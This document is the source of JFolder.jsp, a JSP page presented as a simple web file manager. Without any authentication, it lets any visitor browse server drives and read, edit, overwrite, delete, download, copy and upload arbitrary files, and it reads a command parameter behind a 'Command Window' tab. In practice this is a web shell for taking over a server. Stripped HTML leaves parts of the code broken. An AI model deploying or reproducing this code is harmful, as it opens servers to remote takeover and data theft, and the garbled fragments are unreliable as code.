<% /** JFolder V0.9 windows platform @Filename: JFolder.jsp @Description: 一个简单的系统文件目录显示程序,类似于资源管理器,提供基本的文件操作,不过功能弱多了。 @Author: Steven Cee @Email : cqq1978@Gmail.com @Bugs : 下载时,中文文件名无法正常显示 */ %> <%@ page contentType="text/html;charset=gb2312"%> <%@page import="java.io.*,java.util.*,java.net.*" %> <%! private final static int languageNo=0; //语言版本,0 : 中文; 1:英文 String strThisFile="JFolder.jsp"; String[] authorInfo={" 写的不好,将就着用吧 - - by 慈勤强 http://www.topronet.com "," Thanks for your support - - by Steven Cee http://www.topronet.com "}; String[] strFileManage = {"文 件 管 理","File Management"}; String[] strCommand = {"CMD 命 令","Command Window"}; String[] strSysProperty = {"系 统 属 性","System Property"}; String[] strHelp = {"帮 助","Help"}; String[] strParentFolder = {"上级目录","Parent Folder"}; String[] strCurrentFolder= {"当前目录","Current Folder"}; String[] strDrivers = {"驱动器","Drivers"}; String[] strFileName = {"文件名称","File Name"}; String[] strFileSize = {"文件大小","File Size"}; String[] strLastModified = {"最后修改","Last Modified"}; String[] strFileOperation= {"文件操作","Operations"}; String[] strFileEdit = {"修改","Edit"}; String[] strFileDown = {"下载","Download"}; String[] strFileCopy = {"复制","Move"}; String[] strFileDel = {"删除","Delete"}; String[] strExecute = {"执行","Execute"}; String[] strBack = {"返回","Back"}; String[] strFileSave = {"保存","Save"}; public class FileHandler { private String strAction=""; private String strFile=""; void FileHandler(String action,String f) { } } public static class UploadMonitor { static Hashtable uploadTable = new Hashtable(); static void set(String fName, UplInfo info) { uploadTable.put(fName, info); } static void remove(String fName) { uploadTable.remove(fName); } static UplInfo getInfo(String fName) { UplInfo info = (UplInfo) uploadTable.get(fName); return info; } } public class UplInfo { public long totalSize; public long currSize; public long starttime; public boolean aborted; public UplInfo() { totalSize = 0l; currSize = 0l; starttime = System.currentTimeMillis(); aborted = false; } public UplInfo(int size) { totalSize = size; currSize = 0; starttime = System.currentTimeMillis(); aborted = false; } public String getUprate() { long time = System.currentTimeMillis() - starttime; if (time != 0) { long uprate = currSize * 1000 / time; return convertFileSize(uprate) + "/s"; } else return "n/a"; } public int getPercent() { if (totalSize == 0) return 0; else return (int) (currSize * 100 / totalSize); } public String getTimeElapsed() { long time = (System.currentTimeMillis() - starttime) / 1000l; if (time - 60l >= 0){ if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; else return time / 60 + ":0" + (time % 60) + "m"; } else return time<10 ? "0" + time + "s": time + "s"; } public String getTimeEstimated() { if (currSize == 0) return "n/a"; long time = System.currentTimeMillis() - starttime; time = totalSize * time / currSize; time /= 1000l; if (time - 60l >= 0){ if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; else return time / 60 + ":0" + (time % 60) + "m"; } else return time<10 ? "0" + time + "s": time + "s"; } } public class FileInfo { public String name = null, clientFileName = null, fileContentType = null; private byte[] fileContents = null; public File file = null; public StringBuffer sb = new StringBuffer(100); public void setFileContents(byte[] aByteArray) { fileContents = new byte[aByteArray.length]; System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); } } // A Class with methods used to process a ServletInputStream public class HttpMultiPartParser { private final String lineSeparator = System.getProperty("line.separator", "\n"); private final int ONE_MB = 1024 * 1; public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, int clength) throws IllegalArgumentException, IOException { if (is == null) throw new IllegalArgumentException("InputStream"); if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( "\"" + boundary + "\" is an illegal boundary indicator"); boundary = "--" + boundary; StringTokenizer stLine = null, stFields = null; FileInfo fileInfo = null; Hashtable dataTable = new Hashtable(5); String line = null, field = null, paramName = null; boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); boolean isFile = false; if (saveFiles) { // Create the required directory (including parent dirs) File f = new File(saveInDir); f.mkdirs(); } line = getLine(is); if (line == null || !line.startsWith(boundary)) throw new IOException( "Boundary not found; boundary = " + boundary + ", line = " + line); while (line != null) { if (line == null || !line.startsWith(boundary)) return dataTable; line = getLine(is); if (line == null) return dataTable; stLine = new StringTokenizer(line, ";\r\n"); if (stLine.countTokens() < 2) throw new IllegalArgumentException( "Bad data in second line"); line = stLine.nextToken().toLowerCase(); if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( "Bad data in second line"); stFields = new StringTokenizer(stLine.nextToken(), "=\""); if (stFields.countTokens() < 2) throw new IllegalArgumentException( "Bad data in second line"); fileInfo = new FileInfo(); stFields.nextToken(); paramName = stFields.nextToken(); isFile = false; if (stLine.hasMoreTokens()) { field = stLine.nextToken(); stFields = new StringTokenizer(field, "=\""); if (stFields.countTokens() > 1) { if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { fileInfo.name = paramName; String value = stFields.nextToken(); if (value != null && value.trim().length() > 0) { fileInfo.clientFileName = value; isFile = true; } else { line = getLine(is); // Skip "Content-Type:" line line = getLine(is); // Skip blank line line = getLine(is); // Skip blank line line = getLine(is); // Position to boundary line continue; } } } else if (field.toLowerCase().indexOf("filename") >= 0) { line = getLine(is); // Skip "Content-Type:" line line = getLine(is); // Skip blank line line = getLine(is); // Skip blank line line = getLine(is); // Position to boundary line continue; } } boolean skipBlankLine = true; if (isFile) { line = getLine(is); if (line == null) return dataTable; if (line.trim().length() < 1) skipBlankLine = false; else { stLine = new StringTokenizer(line, ": "); if (stLine.countTokens() < 2) throw new IllegalArgumentException( "Bad data in third line"); stLine.nextToken(); // Content-Type fileInfo.fileContentType = stLine.nextToken(); } } if (skipBlankLine) { line = getLine(is); if (line == null) return dataTable; } if (!isFile) { line = getLine(is); if (line == null) return dataTable; dataTable.put(paramName, line); // If parameter is dir, change saveInDir to dir if (paramName.equals("dir")) saveInDir = line; line = getLine(is); continue; } try { UplInfo uplInfo = new UplInfo(clength); UploadMonitor.set(fileInfo.clientFileName, uplInfo); OutputStream os = null; String path = null; if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, fileInfo.clientFileName)); else os = new ByteArrayOutputStream(ONE_MB); boolean readingContent = true; byte previousLine[] = new byte[2 * ONE_MB]; byte temp[] = null; byte currentLine[] = new byte[2 * ONE_MB]; int read, read3; if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { line = null; break; } while (readingContent) { if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { line = null; uplInfo.aborted = true; break; } if (compareBoundary(boundary, currentLine)) { os.write(previousLine, 0, read - 2); line = new String(currentLine, 0, read3); break; } else { os.write(previousLine, 0, read); uplInfo.currSize += read; temp = currentLine; currentLine = previousLine; previousLine = temp; read = read3; }//end else }//end while os.flush(); os.close(); if (!saveFiles) { ByteArrayOutputStream baos = (ByteArrayOutputStream) os; fileInfo.setFileContents(baos.toByteArray()); } else fileInfo.file = new File(path); dataTable.put(paramName, fileInfo); uplInfo.currSize = uplInfo.totalSize; }//end try catch (IOException e) { throw e; } } return dataTable; } /** * Compares boundary string to byte array */ private boolean compareBoundary(String boundary, byte ba[]) { byte b; if (boundary == null || ba == null) return false; for (int i = 0; i < boundary.length(); i++) if ((byte) boundary.charAt(i) != ba[i]) return false; return true; } /** Convenience method to read HTTP header lines */ private synchronized String getLine(ServletInputStream sis) throws IOException { byte b[] = new byte[1024]; int read = sis.readLine(b, 0, b.length), index; String line = null; if (read != -1) { line = new String(b, 0, read); if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); } return line; } public String getFileName(String dir, String fileName) throws IllegalArgumentException { String path = null; if (dir == null || fileName == null) throw new IllegalArgumentException( "dir or fileName is null"); int index = fileName.lastIndexOf('/'); String name = null; if (index >= 0) name = fileName.substring(index + 1); else name = fileName; index = name.lastIndexOf('\\'); if (index >= 0) fileName = name.substring(index + 1); path = dir + File.separator + fileName; if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); else return path.replace('/', File.separatorChar); } } //End of class HttpMultiPartParser String formatPath(String p) { StringBuffer sb=new StringBuffer(); for (int i = 0; i < p.length(); i++) { if(p.charAt(i)=='\\') { sb.append("\\\\"); } else { sb.append(p.charAt(i)); } } return sb.toString(); } /** * Converts some important chars (int) to the corresponding html string */ static String conv2Html(int i) { if (i == '&') return "&"; else if (i == '<') return "<"; else if (i == '>') return ">"; else if (i == '"') return """; else return "" + (char) i; } /** * Converts a normal string to a html conform string */ static String htmlEncode(String st) { StringBuffer buf = new StringBuffer(); for (int i = 0; i < st.length(); i++) { buf.append(conv2Html(st.charAt(i))); } return buf.toString(); } String getDrivers() /** Windows系统上取得可用的所有逻辑盘 */ { StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : "); File roots[]=File.listRoots(); for(int i=0;i"); sb.append(roots[i]+" "); } return sb.toString(); } static String convertFileSize(long filesize) { //bug 5.09M 显示5.9M String strUnit="Bytes"; String strAfterComma=""; int intDivisor=1; if(filesize>=1024*1024) { strUnit = "MB"; intDivisor=1024*1024; } else if(filesize>=1024) { strUnit = "KB"; intDivisor=1024; } if(intDivisor==1) return filesize + " " + strUnit; strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ; if(strAfterComma=="") strAfterComma=".0"; return filesize / intDivisor + "." + strAfterComma + " " + strUnit; } %> <% request.setCharacterEncoding("gb2312"); String tabID = request.getParameter("tabID"); String strDir = request.getParameter("path"); String strAction = request.getParameter("action"); String strFile = request.getParameter("file"); String strPath = strDir + "\\" + strFile; String strCmd = request.getParameter("cmd"); StringBuffer sbEdit=new StringBuffer(""); StringBuffer sbDown=new StringBuffer(""); StringBuffer sbCopy=new StringBuffer(""); StringBuffer sbSaveCopy=new StringBuffer(""); StringBuffer sbNewFile=new StringBuffer(""); if((tabID==null) || tabID.equals("")) { tabID = "1"; } if(strDir==null||strDir.length()<1) { strDir = request.getRealPath("/"); } if(strAction!=null && strAction.equals("down")) { File f=new File(strPath); if(f.length()==0) { sbDown.append("文件大小为 0 字节,就不用下了吧"); } else { response.setHeader("content-type","text/html; charset=ISO-8859-1"); response.setContentType("APPLICATION/OCTET-STREAM"); response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\""); FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath()); out.clearBuffer(); int i; while ((i=fileInputStream.read()) != -1) { out.write(i); } fileInputStream.close(); out.close(); } } if(strAction!=null && strAction.equals("del")) { File f=new File(strPath); f.delete(); } if(strAction!=null && strAction.equals("edit")) { File f=new File(strPath); BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f))); sbEdit.append("
\r\n"); sbEdit.append("\r\n"); sbEdit.append("\r\n"); sbEdit.append("\r\n"); sbEdit.append(" "); sbEdit.append("  "+strPath+"\r\n"); sbEdit.append("
"); sbEdit.append(""); sbEdit.append("
"); } if(strAction!=null && strAction.equals("save")) { File f=new File(strPath); BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f))); String strContent=request.getParameter("content"); bw.write(strContent); bw.close(); } if(strAction!=null && strAction.equals("copy")) { File f=new File(strPath); sbCopy.append("
\r\n"); sbCopy.append("\r\n"); sbCopy.append("\r\n"); sbCopy.append("\r\n"); sbCopy.append("原始文件: "+strPath+"

"); sbCopy.append("目标文件:

"); sbCopy.append(" "); sbCopy.append("

 \r\n"); sbCopy.append("

"); } if(strAction!=null && strAction.equals("savecopy")) { File f=new File(strPath); String strDesFile=request.getParameter("file2"); if(strDesFile==null || strDesFile.equals("")) { sbSaveCopy.append("

目标文件错误。"); } else { File f_des=new File(strDesFile); if(f_des.isFile()) { sbSaveCopy.append("

目标文件已存在,不能复制。"); } else { String strTmpFile=strDesFile; if(f_des.isDirectory()) { if(!strDesFile.endsWith("\\")) { strDesFile=strDesFile+"\\"; } strTmpFile=strDesFile+"cqq_"+strFile; } File f_des_copy=new File(strTmpFile); FileInputStream in1=new FileInputStream(f); FileOutputStream out1=new FileOutputStream(f_des_copy); byte[] buffer=new byte[1024]; int c; while((c=in1.read(buffer))!=-1) { out1.write(buffer,0,c); } in1.close(); out1.close(); sbSaveCopy.append("原始文件 :"+strPath+"

"); sbSaveCopy.append("目标文件 :"+strTmpFile+"

"); sbSaveCopy.append("复制成功!"); } } sbSaveCopy.append("

"); } if(strAction!=null && strAction.equals("newFile")) { String strF=request.getParameter("fileName"); String strType1=request.getParameter("btnNewFile"); String strType2=request.getParameter("btnNewDir"); String strType=""; if(strType1==null) { strType="Dir"; } else if(strType2==null) { strType="File"; } if(!strType.equals("") && !(strF==null || strF.equals(""))) { File f_new=new File(strF); if(strType.equals("File") && !f_new.createNewFile()) sbNewFile.append(strF+" 文件创建失败"); if(strType.equals("Dir") && !f_new.mkdirs()) sbNewFile.append(strF+" 目录创建失败"); } else { sbNewFile.append("

建立文件或目录出错。"); } } if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart"))) { String tempdir="."; boolean error=false; response.setContentType("text/html"); sbNewFile.append("

建立文件或目录出错。"); HttpMultiPartParser parser = new HttpMultiPartParser(); int bstart = request.getContentType().lastIndexOf("oundary="); String bound = request.getContentType().substring(bstart + 8); int clength = request.getContentLength(); Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength); if (ht.get("cqqUploadFile") != null) { FileInfo fi = (FileInfo) ht.get("cqqUploadFile"); File f1 = fi.file; UplInfo info = UploadMonitor.getInfo(fi.clientFileName); if (info != null && info.aborted) { f1.delete(); request.setAttribute("error", "Upload aborted"); } else { String path = (String) ht.get("path"); if(path!=null && !path.endsWith("\\")) path = path + "\\"; if (!f1.renameTo(new File(path + f1.getName()))) { request.setAttribute("error", "Cannot upload file."); error = true; f1.delete(); } } } } %> JFoler 0.9 ---A jsp based web folder management tool by Steven Cee

<% StringBuffer sbFolder=new StringBuffer(""); StringBuffer sbFile=new StringBuffer(""); try { File objFile = new File(strDir); File list[] = objFile.listFiles(); if(objFile.getAbsolutePath().length()>3) { sbFolder.append(" "); sbFolder.append(strParentFolder[languageNo]+"
- - - - - - - - - - - \r\n "); } for(int i=0;i "); sbFolder.append(" "); sbFolder.append(list[i].getName()+"
"); } else { String strLen=""; String strDT=""; long lFile=0; lFile=list[i].length(); strLen = convertFileSize(lFile); Date dt=new Date(list[i].lastModified()); strDT=dt.toLocaleString(); sbFile.append(""); sbFile.append(""+list[i].getName()); sbFile.append(""); sbFile.append(""+strLen); sbFile.append(""); sbFile.append(""+strDT); sbFile.append(""); sbFile.append("  "); sbFile.append(strFileEdit[languageNo]+" "); sbFile.append("  "); sbFile.append(strFileDel[languageNo]+" "); sbFile.append("  "); sbFile.append(strFileDown[languageNo]+" "); sbFile.append("  "); sbFile.append(strFileCopy[languageNo]+" "); } } } catch(Exception e) { out.println("操作失败: "+e.toString()+""); } %>

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Any question, please email me cqq1978@Gmail.com